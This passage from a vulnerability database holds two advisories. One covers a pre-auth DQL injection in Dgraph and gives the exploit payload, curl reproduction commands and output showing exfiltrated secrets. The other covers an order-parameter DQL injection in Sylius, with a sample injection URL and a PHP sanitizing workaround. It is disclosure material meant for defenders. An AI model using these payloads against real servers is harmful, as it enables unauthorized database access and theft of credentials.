Step 9. processQuery executes both queries. The leak block traverses every node with a dgraph.type predicate and returns all requested fields.
Step 10. The response is returned to the attacker at http.go:498. The data.queries.leak array contains every matching node with all their predicates.
8. Proof of Concept
Files
| File | Purpose |
|---|---|
| report.md | This vulnerability report |
| poc.py | Exploit: sets up schema, seeds data, injects, prints leak |
| docker-compose.yml | Spins up a Dgraph cluster (1 Zero + 1 Alpha, default config) |
| DGraphPreAuthLangDQL.mp4 | Screen recording of the full attack from start to exfiltration |
ZIP with all the relevant files: DGraphPreAuthDQLLang.zip
poc.py
The exploit performs three operations: (1) creates the @unique @index(exact) @lang schema, (2) seeds test data including user secrets and AWS credentials, (3) sends the injection mutation and prints all exfiltrated records.
Tested Output
$ python3 poc.py
[*] Target: http://localhost:8080
[*] LEAD_002: DQL Injection via NQuad Lang Field in addQueryIfUnique
[+] Schema created: name @unique @index(exact) @lang
[+] Seed data inserted (4 nodes with secrets)
[*] Sending injection payload to http://localhost:8080/mutate?commitNow=true
[+] SUCCESS: Exfiltrated 5 nodes via DQL injection!
============================================================
UID: 0xf5fcd
Type: ['dgraph.graphql']
Name: N/A
Email: N/A
----------------------------------------
UID: 0xf5fce
Type: ['Person']
Name: Alice
Email: alice@example.com
SECRET: s3cr3t_alice
----------------------------------------
UID: 0xf5fcf
Type: ['Person']
Name: Bob
Email: bob@corp.com
SECRET: bob_password_123
----------------------------------------
UID: 0xf5fd0
Type: ['Admin']
Name: root
Email: admin@internal
SECRET: ADMIN_MASTER_KEY_DO_NOT_SHARE
----------------------------------------
UID: 0xf5fd1
Type: ['ServiceAccount']
Name: prod-s3-backup
Email: infra@corp.com
AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
----------------------------------------
============================================================
[+] VULNERABILITY CONFIRMED: Pre-auth DQL injection via Lang field
[+] Impact: Full database read access without authentication
9. Steps to Reproduce
Prerequisites
- Python 3 with
requests(pip install requests) - Docker and Docker Compose
Step 1: Start Dgraph
cd LEAD_002_DQL_LANG
docker compose up -d
Wait for health:
curl http://localhost:8080/health
Step 2: Run the exploit
python3 poc.py
The PoC handles schema creation, data seeding, and exploitation automatically.
Step 3: Manual reproduction
To reproduce manually without the PoC script:
# Set up schema
curl -s -X POST http://localhost:8080/alter -d '
name: string @unique @index(exact) @lang .
email: string @index(exact) .
secret: string .
aws_access_key_id: string .
aws_secret_access_key: string .
'
# Seed data
curl -s -X POST 'http://localhost:8080/mutate?commitNow=true' \
-H 'Content-Type: application/json' \
-d '{"set":[
{"dgraph.type":"Person","name":"Alice","email":"alice@example.com","secret":"s3cr3t_alice"},
{"dgraph.type":"Admin","name":"root","email":"admin@internal","secret":"ADMIN_MASTER_KEY"},
{"dgraph.type":"ServiceAccount","name":"prod-s3-backup","aws_access_key_id":"AKIAIOSFODNN7EXAMPLE","aws_secret_access_key":"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"}
]}'
# Exploit: single request exfiltrates everything
curl -s -X POST 'http://localhost:8080/mutate?commitNow=true' \
-H 'Content-Type: application/json' \
-d '{"set":[{"uid":"_:x","name@en,\"x\")) leak(func: has(dgraph.type)) { uid dgraph.type name email secret aws_access_key_id aws_secret_access_key } } #":"anything"}]}' \
| python3 -m json.tool
What to verify
- HTTP POST returns 200 (endpoint is reachable without auth)
- Response contains
data.queries.leakwith an array of nodes - The nodes include secrets, AWS credentials, and other data the attacker never queried through legitimate means
- The mutation also succeeds (a new node is created), confirming that the injection does not break the mutation flow
10. Mitigations and Patch
Location: edgraph/server.go, addQueryIfUnique (line 1778) and x/x.go, PredicateLang (line 919)
- Validate
nq.Lang: Add validation invalidateKeys(or a newvalidateLangfunction) that restricts theLangfield to BCP 47 language tags:^[a-zA-Z]{2,3}(-[a-zA-Z0-9]+)*$. Reject anyLangvalue containing parentheses, braces, quotes,#, newlines, or other DQL-significant characters. - Parameterize DQL queries: Replace the
fmt.Sprintfquery construction inaddQueryIfUniquewith a structured query builder that constructs DQL AST nodes programmatically. This eliminates the injection surface entirely because the predicate name is passed as a typed value rather than interpolated as a raw string. - Escape at the sink: If parameterization is not immediately feasible, escape DQL-significant characters (
),{,},",#, newlines) in bothpredicateNameandvalbefore interpolation at line 1808. - Defense in depth: After query construction, validate that the resulting DQL contains exactly the expected number of root query blocks. The uniqueness check should produce exactly one
var(...)block per unique predicate. Any additional blocks indicate injection.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/dgraph-io/dgraph/v25"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "25.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/dgraph-io/dgraph/v24"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "24.1.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/dgraph-io/dgraph"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.2.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41328"
],
"database_specific": {
"cwe_ids": [
"CWE-943"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-24T15:41:42Z",
"nvd_published_at": "2026-04-24T19:17:12Z",
"severity": "CRITICAL"
},
"details": "## 1. Executive Summary\n\nA vulnerability has been found in Dgraph that gives an unauthenticated attacker full read access to every piece of data in the database. This affects Dgraph\u0027s default configuration where ACL is not enabled.\n\nThe attack requires two HTTP POSTs to port 8080. The first sets up a schema predicate with `@unique @index(exact) @lang` via `/alter` (also unauthenticated in default config). The second sends a crafted JSON mutation to `/mutate?commitNow=true` where a JSON key contains the predicate name followed by `@` and a DQL injection payload in the language tag position.\n\nThe injection exploits the `addQueryIfUnique` function in `edgraph/server.go`, which constructs DQL queries using `fmt.Sprintf` with unsanitized `predicateName` that includes the raw `pred.Lang` value. The `Lang` field is extracted from JSON mutation keys by `x.PredicateLang()`, which splits on `@`, and is never validated by any function in the codebase. The attacker injects a closing parenthesis to escape the `eq()` function, adds an arbitrary named query block, and uses a `#` comment to neutralize trailing template syntax. The injected query executes server-side and its results are returned in the HTTP response.\n\nPOC clip: \n\nhttps://github.com/user-attachments/assets/bbfb7bba-c957-4b57-b534-48a958314186\n\n\n\n## 2. CVSS Score\n\n**CVSS 3.1: 9.1 (Critical)**\n\n```\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n```\n\n\n| Metric | Value | Rationale |\n| ------------------- | --------- | ---------------------------------------------------------------------------------------------------------------------------------- |\n| Attack Vector | Network | HTTP POST to port 8080 |\n| Attack Complexity | Low | Two requests, deterministic outcome, no special conditions |\n| Privileges Required | None | No authentication when ACL is disabled (default) |\n| User Interaction | None | Fully automated |\n| Scope | Unchanged | Stays within the Dgraph data layer |\n| Confidentiality | High | Full database exfiltration: all nodes, all predicates, all values |\n| Integrity | High | The mutation that carries the injection also writes data; the attacker can also set up arbitrary schema via unauthenticated /alter |\n| Availability | None | No denial of service |\n\n\n## 3. Vulnerability Summary\n\n\n| Field | Value |\n| ----- | --------------------------------------------------------------------------- |\n| Title | Pre-Auth DQL Injection via Unsanitized NQuad Lang Field in addQueryIfUnique |\n| Type | Injection |\n| CWE | CWE-943 (Improper Neutralization of Special Elements in Data Query Logic) |\n| CVSS | 9.8 |\n\n\n## 4. Target Information\n\n\n| Field | Value |\n| --------------------- | ------------------------------------------------------------------------------------------------------------------------ |\n| Project | Dgraph |\n| Repository | [https://github.com/dgraph-io/dgraph](https://github.com/dgraph-io/dgraph) |\n| Tested version | v25.3.0 |\n| Lang split | `x/x.go` line 919 (`PredicateLang` splits on `@`, returns everything after as `Lang`) |\n| Lang assignment | `chunker/json_parser.go` line 524 (`nq.Predicate, nq.Lang = x.PredicateLang(nq.Predicate)`) |\n| Validation gap | `edgraph/server.go` line 2142 (`validateKeys` checks `nq.Predicate` only, never `nq.Lang`) |\n| Injection sink | `edgraph/server.go` line 1808 (`fmt.Sprintf` with `predicateName` containing raw `pred.Lang`) |\n| predicateName build | `edgraph/server.go` line 1780 (`fmt.Sprintf(\"%v@%v\", predicateName, pred.Lang)`) |\n| Auth bypass (query) | `edgraph/access.go` line 958 (`authorizeQuery` returns nil when `AclSecretKey == nil`) |\n| Auth bypass (mutate) | `edgraph/access.go` line 788 (`authorizeMutation` returns nil when `AclSecretKey == nil`) |\n| Response exfiltration | `dgraph/cmd/alpha/http.go` line 498 (`mp[\"queries\"] = json.RawMessage(resp.Json)`) |\n| HTTP port | 8080 (default) |\n| Prerequisite | A predicate with `@unique @index(exact) @lang` in the schema. The attacker can create this via unauthenticated `/alter`. |\n\n\n## 5. Test Environment\n\n\n| Component | Version / Details |\n| -------------- | ------------------------------------------------------------------ |\n| Host OS | macOS (darwin 25.3.0) |\n| Dgraph | v25.3.0 via `dgraph/dgraph:latest` Docker image |\n| Docker Compose | 1 Zero + 1 Alpha, default config, `whitelist=0.0.0.0/0` |\n| Python | 3.x with `requests` |\n| Network | localhost (127.0.0.1) |\n\n\n## 6. Vulnerability Detail\n\n**Location:** `edgraph/server.go` lines 1778-1808 (`addQueryIfUnique`)\n**CWE:** CWE-943 (Improper Neutralization of Special Elements in Data Query Logic)\n\nThe `/mutate` endpoint accepts JSON mutations. When a predicate has the `@unique` directive, the `addQueryIfUnique` function builds a DQL query to check whether the value already exists.\n\nThe JSON chunker at `json_parser.go:524` splits mutation keys on `@` via `x.PredicateLang`:\n\n```go\nnq.Predicate, nq.Lang = x.PredicateLang(nq.Predicate)\n```\n\n`PredicateLang` at `x/x.go:919` splits on the last `@` and returns everything after it as the `Lang` string with no validation:\n\n```go\nfunc PredicateLang(s string) (string, string) {\n i := strings.LastIndex(s, \"@\")\n if i \u003c= 0 {\n return s, \"\"\n }\n return s[0:i], s[i+1:]\n}\n```\n\n`validateKeys` at `server.go:2142` validates only `nq.Predicate`. It never touches `nq.Lang`:\n\n```go\nfunc validateKeys(nq *api.NQuad) error {\n if err := validateKey(nq.Predicate); err != nil {\n return errors.Wrapf(err, \"predicate %q\", nq.Predicate)\n }\n for i := range nq.Facets {\n // ... validates facet keys ...\n }\n return nil // nq.Lang is never checked\n}\n```\n\n`addQueryIfUnique` at `server.go:1778-1808` builds `predicateName` from the predicate and the raw `Lang`, then interpolates it into a DQL query via `fmt.Sprintf`:\n\n```go\npredicateName := fmt.Sprintf(\"\u003c%v\u003e\", pred.Predicate)\nif pred.Lang != \"\" {\n predicateName = fmt.Sprintf(\"%v@%v\", predicateName, pred.Lang)\n}\n// ...\nquery := fmt.Sprintf(`%v as var(func: eq(%v,\"%v\"))`, queryVar, predicateName, val[1:len(val)-1])\n```\n\nThere is no escaping, no parameterization, no structural validation, and no character allowlist applied to `pred.Lang` anywhere between the HTTP input and the `fmt.Sprintf` query construction.\n\nAn attacker crafts a JSON mutation key:\n\n```\nname@en,\"x\")) leak(func: has(dgraph.type)) { uid dgraph.type name email secret aws_access_key_id aws_secret_access_key } } #\n```\n\nAfter `PredicateLang` splits on `@`:\n\n- `Predicate` = `name` (passes all validation)\n- `Lang` = `en,\"x\")) leak(func: has(dgraph.type)) { ... } } #` (never validated)\n\nThe constructed DQL becomes:\n\n```dql\n{\n __dgraph_uniquecheck_0__ as var(func: eq(\u003cname\u003e@en,\"x\"))\n leak(func: has(dgraph.type)) { uid dgraph.type name email secret aws_access_key_id aws_secret_access_key }\n}\n```\n\nThe `#` comment neutralizes any trailing syntax from the template. The DQL parser accepts this as two valid query blocks: a `var` query (returns empty) and a named `leak` query that exfiltrates all data. The uniqueness check passes (no existing `name@en` equals `\"x\"`), so the mutation succeeds, and the injected query results are returned in `data.queries.leak`.\n\n## 7. Full Chain Explanation\n\nThe attacker has no Dgraph credentials and no prior access to the server.\n\n**Step 1.** The attacker creates the required schema via unauthenticated `/alter`:\n\n```\nPOST /alter HTTP/1.1\nHost: TARGET:8080\n\nname: string @unique @index(exact) @lang .\n```\n\nNo `X-Dgraph-AccessToken` header. In default configuration, `/alter` has no authentication when ACL is disabled.\n\n**Step 2.** The attacker sends the injection payload:\n\n```\nPOST /mutate?commitNow=true HTTP/1.1\nHost: TARGET:8080\nContent-Type: application/json\n\n{\n \"set\": [{\n \"uid\": \"_:inject\",\n \"name@en,\\\"x\\\")) leak(func: has(dgraph.type)) { uid dgraph.type name email secret aws_access_key_id aws_secret_access_key } } #\": \"anything\"\n }]\n}\n```\n\n**Step 3.** `mutationHandler` at `http.go:345` parses the JSON body. The key `name@en,...` is treated as predicate `name` with language tag `en,\"x\")) leak(...) } } #`.\n\n**Step 4.** `x.PredicateLang` at `x.go:919` splits the key on the last `@`. The `Predicate` is `name`. The `Lang` is the injection payload.\n\n**Step 5.** `validateKeys` at `server.go:2142` validates only `nq.Predicate` (`name`), which passes. `nq.Lang` is never checked.\n\n**Step 6.** `addQueryIfUnique` at `server.go:1778` constructs `predicateName` by appending the raw `pred.Lang` at line 1780. At line 1808, `fmt.Sprintf` interpolates this into the DQL query string.\n\n**Step 7.** `dql.ParseWithNeedVars` parses the constructed DQL. It encounters the original `var` query and the injected `leak` query. Both are accepted as valid DQL.\n\n**Step 8.** `authorizeQuery` at `access.go:958` returns `nil` because `AclSecretKey == nil` (default). No predicate-level authorization is performed.\n\n**Step 9.** `processQuery` executes both queries. The `leak` block traverses every node with a `dgraph.type` predicate and returns all requested fields.\n\n**Step 10.** The response is returned to the attacker at `http.go:498`. The `data.queries.leak` array contains every matching node with all their predicates.\n\n## 8. Proof of Concept\n\n### Files\n\n\n| File | Purpose |\n| ------------------ | ------------------------------------------------------------ |\n| report.md | This vulnerability report |\n| poc.py | Exploit: sets up schema, seeds data, injects, prints leak |\n| docker-compose.yml | Spins up a Dgraph cluster (1 Zero + 1 Alpha, default config) |\n| DGraphPreAuthLangDQL.mp4 | Screen recording of the full attack from start to exfiltration |\n\nZIP with all the relevant files: \n[DGraphPreAuthDQLLang.zip](https://github.com/user-attachments/files/26002498/DGraphPreAuthDQLLang.zip)\n\n\n### poc.py\n\nThe exploit performs three operations: (1) creates the `@unique @index(exact) @lang` schema, (2) seeds test data including user secrets and AWS credentials, (3) sends the injection mutation and prints all exfiltrated records.\n\n### Tested Output\n\n```\n$ python3 poc.py\n[*] Target: http://localhost:8080\n[*] LEAD_002: DQL Injection via NQuad Lang Field in addQueryIfUnique\n\n[+] Schema created: name @unique @index(exact) @lang\n[+] Seed data inserted (4 nodes with secrets)\n[*] Sending injection payload to http://localhost:8080/mutate?commitNow=true\n[+] SUCCESS: Exfiltrated 5 nodes via DQL injection!\n============================================================\n UID: 0xf5fcd\n Type: [\u0027dgraph.graphql\u0027]\n Name: N/A\n Email: N/A\n----------------------------------------\n UID: 0xf5fce\n Type: [\u0027Person\u0027]\n Name: Alice\n Email: alice@example.com\n SECRET: s3cr3t_alice\n----------------------------------------\n UID: 0xf5fcf\n Type: [\u0027Person\u0027]\n Name: Bob\n Email: bob@corp.com\n SECRET: bob_password_123\n----------------------------------------\n UID: 0xf5fd0\n Type: [\u0027Admin\u0027]\n Name: root\n Email: admin@internal\n SECRET: ADMIN_MASTER_KEY_DO_NOT_SHARE\n----------------------------------------\n UID: 0xf5fd1\n Type: [\u0027ServiceAccount\u0027]\n Name: prod-s3-backup\n Email: infra@corp.com\n AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE\n AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n----------------------------------------\n============================================================\n\n[+] VULNERABILITY CONFIRMED: Pre-auth DQL injection via Lang field\n[+] Impact: Full database read access without authentication\n```\n\n## 9. Steps to Reproduce\n\n### Prerequisites\n\n- Python 3 with `requests` (`pip install requests`)\n- Docker and Docker Compose\n\n### Step 1: Start Dgraph\n\n```bash\ncd LEAD_002_DQL_LANG\ndocker compose up -d\n```\n\nWait for health:\n\n```bash\ncurl http://localhost:8080/health\n```\n\n### Step 2: Run the exploit\n\n```bash\npython3 poc.py\n```\n\nThe PoC handles schema creation, data seeding, and exploitation automatically.\n\n### Step 3: Manual reproduction\n\nTo reproduce manually without the PoC script:\n\n```bash\n# Set up schema\ncurl -s -X POST http://localhost:8080/alter -d \u0027\nname: string @unique @index(exact) @lang .\nemail: string @index(exact) .\nsecret: string .\naws_access_key_id: string .\naws_secret_access_key: string .\n\u0027\n\n# Seed data\ncurl -s -X POST \u0027http://localhost:8080/mutate?commitNow=true\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"set\":[\n {\"dgraph.type\":\"Person\",\"name\":\"Alice\",\"email\":\"alice@example.com\",\"secret\":\"s3cr3t_alice\"},\n {\"dgraph.type\":\"Admin\",\"name\":\"root\",\"email\":\"admin@internal\",\"secret\":\"ADMIN_MASTER_KEY\"},\n {\"dgraph.type\":\"ServiceAccount\",\"name\":\"prod-s3-backup\",\"aws_access_key_id\":\"AKIAIOSFODNN7EXAMPLE\",\"aws_secret_access_key\":\"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\"}\n ]}\u0027\n\n# Exploit: single request exfiltrates everything\ncurl -s -X POST \u0027http://localhost:8080/mutate?commitNow=true\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"set\":[{\"uid\":\"_:x\",\"name@en,\\\"x\\\")) leak(func: has(dgraph.type)) { uid dgraph.type name email secret aws_access_key_id aws_secret_access_key } } #\":\"anything\"}]}\u0027 \\\n | python3 -m json.tool\n```\n\n### What to verify\n\n1. HTTP POST returns 200 (endpoint is reachable without auth)\n2. Response contains `data.queries.leak` with an array of nodes\n3. The nodes include secrets, AWS credentials, and other data the attacker never queried through legitimate means\n4. The mutation also succeeds (a new node is created), confirming that the injection does not break the mutation flow\n\n## 10. Mitigations and Patch\n\n**Location:** `edgraph/server.go`, `addQueryIfUnique` (line 1778) and `x/x.go`, `PredicateLang` (line 919)\n\n1. **Validate `nq.Lang`:** Add validation in `validateKeys` (or a new `validateLang` function) that restricts the `Lang` field to BCP 47 language tags: `^[a-zA-Z]{2,3}(-[a-zA-Z0-9]+)*$`. Reject any `Lang` value containing parentheses, braces, quotes, `#`, newlines, or other DQL-significant characters.\n2. **Parameterize DQL queries:** Replace the `fmt.Sprintf` query construction in `addQueryIfUnique` with a structured query builder that constructs DQL AST nodes programmatically. This eliminates the injection surface entirely because the predicate name is passed as a typed value rather than interpolated as a raw string.\n3. **Escape at the sink:** If parameterization is not immediately feasible, escape DQL-significant characters (`)`, `{`, `}`, `\"`, `#`, newlines) in both `predicateName` and `val` before interpolation at line 1808.\n4. **Defense in depth:** After query construction, validate that the resulting DQL contains exactly the expected number of root query blocks. The uniqueness check should produce exactly one `var(...)` block per unique predicate. Any additional blocks indicate injection.",
"id": "GHSA-x92x-px7w-4gx4",
"modified": "2026-07-08T00:34:30Z",
"published": "2026-04-24T15:41:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dgraph-io/dgraph/security/advisories/GHSA-x92x-px7w-4gx4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41328"
},
{
"type": "PACKAGE",
"url": "https://github.com/dgraph-io/dgraph"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Dgraph: Pre-Auth Full Database Exfiltration via DQL Injection in NQuad Lang Field"
}
GHSA-XCWX-R2GW-W93M
Vulnerability from github – Published: 2026-03-11 00:13 – Updated: 2026-03-11 20:33Impact
Sylius API filters ProductPriceOrderFilter and TranslationOrderNameAndLocaleFilter pass user-supplied order direction values directly to Doctrine's orderBy() without validation. An attacker can inject arbitrary DQL:
GET /api/v2/shop/products?order[price]=ASC,%20variant.code%20DESC
Patches
The issue is fixed in versions: 1.9.12, 1.10.16, 1.11.17, 1.12.23, 1.13.15, 1.14.18, 2.0.16, 2.1.12, 2.2.3 and above.
Workarounds
An EventSubscriber that sanitizes order query parameters only on API routes before they reach the vulnerable filters.
The subscriber accepts an $apiRoute constructor parameter (default /api/v2) and skips non-API requests entirely — so there is zero overhead on shop/admin page requests.
This follows the same pattern used by Sylius's own KernelRequestEventSubscriber (src/Sylius/Bundle/ApiBundle/EventSubscriber/KernelRequestEventSubscriber.php), which also uses str_contains($pathInfo, $this->apiRoute) to scope logic to API routes.
Step 1 — Create the EventSubscriber
src/EventSubscriber/SanitizeOrderDirectionSubscriber.php:
<?php
declare(strict_types=1);
namespace App\EventSubscriber;
use Symfony\Component\EventDispatcher\EventSubscriberInterface;
use Symfony\Component\HttpKernel\Event\RequestEvent;
use Symfony\Component\HttpKernel\KernelEvents;
final class SanitizeOrderDirectionSubscriber implements EventSubscriberInterface
{
private const ALLOWED_DIRECTIONS = ['asc', 'desc'];
public function __construct(
private string $apiRoute,
) {
}
public static function getSubscribedEvents(): array
{
return [
KernelEvents::REQUEST => ['sanitizeOrderParameters', 64],
];
}
public function sanitizeOrderParameters(RequestEvent $event): void
{
if (!str_contains($event->getRequest()->getPathInfo(), $this->apiRoute)) {
return;
}
$request = $event->getRequest();
/** @var mixed $order */
$order = $request->query->all()['order'] ?? null;
if (!is_array($order)) {
return;
}
$needsSanitization = false;
$sanitized = [];
foreach ($order as $field => $direction) {
if (is_string($direction) && in_array(strtolower($direction), self::ALLOWED_DIRECTIONS, true)) {
$sanitized[$field] = $direction;
} else {
$needsSanitization = true;
}
}
if (!$needsSanitization) {
return;
}
$all = $request->query->all();
$all['order'] = $sanitized;
$request->query->replace($all);
$request->server->set('QUERY_STRING', http_build_query($all));
$request->attributes->set('_api_filters', $all);
}
}
Step 2 — Register the service
Option A — If your config/services.yaml already has App\ autowiring (Symfony default):
# Nothing to do — autoconfigure picks up EventSubscriberInterface automatically.
# Optionally bind the API route prefix:
services:
App\EventSubscriber\SanitizeOrderDirectionSubscriber:
arguments:
$apiRoute: '%sylius.security.new_api_route%'
Option B — If there is no App\ autowiring:
services:
App\EventSubscriber\SanitizeOrderDirectionSubscriber:
arguments:
$apiRoute: '%sylius.security.new_api_route%'
tags: ['kernel.event_subscriber']
Using %sylius.security.new_api_route% ties the subscriber to the same prefix Sylius uses (/api/v2 by default). If the parameter is not available, hardcode '/api/v2' instead.
Step 3 — Clear cache
bin/console cache:clear
Reporters
We would like to extend our gratitude to the following individuals for their detailed reporting and responsible disclosure of this vulnerability: - Chris Alupului (@Neosprings) - Bartłomiej Nowiński (@bnBart)
For more information
If you have any questions or comments about this advisory:
- Open an issue in Sylius issues
- Email us at security@sylius.com
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.9.11"
},
"package": {
"ecosystem": "Packagist",
"name": "sylius/sylius"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.10.15"
},
"package": {
"ecosystem": "Packagist",
"name": "sylius/sylius"
},
"ranges": [
{
"events": [
{
"introduced": "1.10.0"
},
{
"fixed": "1.10.16"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.11.16"
},
"package": {
"ecosystem": "Packagist",
"name": "sylius/sylius"
},
"ranges": [
{
"events": [
{
"introduced": "1.11.0"
},
{
"fixed": "1.11.17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.12.22"
},
"package": {
"ecosystem": "Packagist",
"name": "sylius/sylius"
},
"ranges": [
{
"events": [
{
"introduced": "1.12.0"
},
{
"fixed": "1.12.23"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.13.14"
},
"package": {
"ecosystem": "Packagist",
"name": "sylius/sylius"
},
"ranges": [
{
"events": [
{
"introduced": "1.13.0"
},
{
"fixed": "1.13.15"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.14.17"
},
"package": {
"ecosystem": "Packagist",
"name": "sylius/sylius"
},
"ranges": [
{
"events": [
{
"introduced": "1.14.0"
},
{
"fixed": "1.14.18"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.0.15"
},
"package": {
"ecosystem": "Packagist",
"name": "sylius/sylius"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.16"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.1.11"
},
"package": {
"ecosystem": "Packagist",
"name": "sylius/sylius"
},
"ranges": [
{
"events": [
{
"introduced": "2.1.0"
},
{
"fixed": "2.1.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.2.2"
},
"package": {
"ecosystem": "Packagist",
"name": "sylius/sylius"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-31825"
],
"database_specific": {
"cwe_ids": [
"CWE-89",
"CWE-943"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-11T00:13:41Z",
"nvd_published_at": "2026-03-10T22:16:20Z",
"severity": "MODERATE"
},
"details": "### Impact\nSylius API filters `ProductPriceOrderFilter` and `TranslationOrderNameAndLocaleFilter` pass user-supplied order direction values directly to Doctrine\u0027s `orderBy()` without validation. An attacker can inject arbitrary DQL:\n\n```\nGET /api/v2/shop/products?order[price]=ASC,%20variant.code%20DESC\n```\n\n### Patches\nThe issue is fixed in versions: 1.9.12, 1.10.16, 1.11.17, 1.12.23, 1.13.15, 1.14.18, 2.0.16, 2.1.12, 2.2.3 and above.\n\n### Workarounds\n\nAn `EventSubscriber` that sanitizes `order` query parameters **only on API routes** before they reach the vulnerable filters.\n\nThe subscriber accepts an `$apiRoute` constructor parameter (default `/api/v2`) and skips non-API requests entirely \u2014 so there is zero overhead on shop/admin page requests.\n\nThis follows the same pattern used by Sylius\u0027s own `KernelRequestEventSubscriber` (`src/Sylius/Bundle/ApiBundle/EventSubscriber/KernelRequestEventSubscriber.php`), which also uses `str_contains($pathInfo, $this-\u003eapiRoute)` to scope logic to API routes.\n\n---\n\n#### Step 1 \u2014 Create the EventSubscriber\n\n`src/EventSubscriber/SanitizeOrderDirectionSubscriber.php`:\n\n```php\n\u003c?php\n\ndeclare(strict_types=1);\n\nnamespace App\\EventSubscriber;\n\nuse Symfony\\Component\\EventDispatcher\\EventSubscriberInterface;\nuse Symfony\\Component\\HttpKernel\\Event\\RequestEvent;\nuse Symfony\\Component\\HttpKernel\\KernelEvents;\n\nfinal class SanitizeOrderDirectionSubscriber implements EventSubscriberInterface\n{\n private const ALLOWED_DIRECTIONS = [\u0027asc\u0027, \u0027desc\u0027];\n\n public function __construct(\n private string $apiRoute,\n ) {\n }\n\n public static function getSubscribedEvents(): array\n {\n return [\n KernelEvents::REQUEST =\u003e [\u0027sanitizeOrderParameters\u0027, 64],\n ];\n }\n\n public function sanitizeOrderParameters(RequestEvent $event): void\n {\n if (!str_contains($event-\u003egetRequest()-\u003egetPathInfo(), $this-\u003eapiRoute)) {\n return;\n }\n\n $request = $event-\u003egetRequest();\n\n /** @var mixed $order */\n $order = $request-\u003equery-\u003eall()[\u0027order\u0027] ?? null;\n if (!is_array($order)) {\n return;\n }\n\n $needsSanitization = false;\n $sanitized = [];\n foreach ($order as $field =\u003e $direction) {\n if (is_string($direction) \u0026\u0026 in_array(strtolower($direction), self::ALLOWED_DIRECTIONS, true)) {\n $sanitized[$field] = $direction;\n } else {\n $needsSanitization = true;\n }\n }\n\n if (!$needsSanitization) {\n return;\n }\n\n $all = $request-\u003equery-\u003eall();\n $all[\u0027order\u0027] = $sanitized;\n $request-\u003equery-\u003ereplace($all);\n\n $request-\u003eserver-\u003eset(\u0027QUERY_STRING\u0027, http_build_query($all));\n $request-\u003eattributes-\u003eset(\u0027_api_filters\u0027, $all);\n }\n}\n```\n\n#### Step 2 \u2014 Register the service\n\n**Option A** \u2014 If your `config/services.yaml` already has `App\\` autowiring (Symfony default):\n\n```yaml\n# Nothing to do \u2014 autoconfigure picks up EventSubscriberInterface automatically.\n# Optionally bind the API route prefix:\nservices:\n App\\EventSubscriber\\SanitizeOrderDirectionSubscriber:\n arguments:\n $apiRoute: \u0027%sylius.security.new_api_route%\u0027\n```\n\n**Option B** \u2014 If there is no `App\\` autowiring:\n\n```yaml\nservices:\n App\\EventSubscriber\\SanitizeOrderDirectionSubscriber:\n arguments:\n $apiRoute: \u0027%sylius.security.new_api_route%\u0027\n tags: [\u0027kernel.event_subscriber\u0027]\n```\n\nUsing `%sylius.security.new_api_route%` ties the subscriber to the same prefix Sylius uses (`/api/v2` by default). If the parameter is not available, hardcode `\u0027/api/v2\u0027` instead.\n\n#### Step 3 \u2014 Clear cache\n\n```bash\nbin/console cache:clear\n```\n\n### Reporters\n\nWe would like to extend our gratitude to the following individuals for their detailed reporting and responsible disclosure of this vulnerability:\n- Chris Alupului (@Neosprings)\n- Bart\u0142omiej Nowi\u0144ski (@bnBart)\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n- Open an issue in [Sylius issues](https://github.com/Sylius/Sylius/issues?q=sort%3Aupdated-desc+is%3Aissue+is%3Aopen)\n- Email us at [security@sylius.com](mailto:security@sylius.com)",
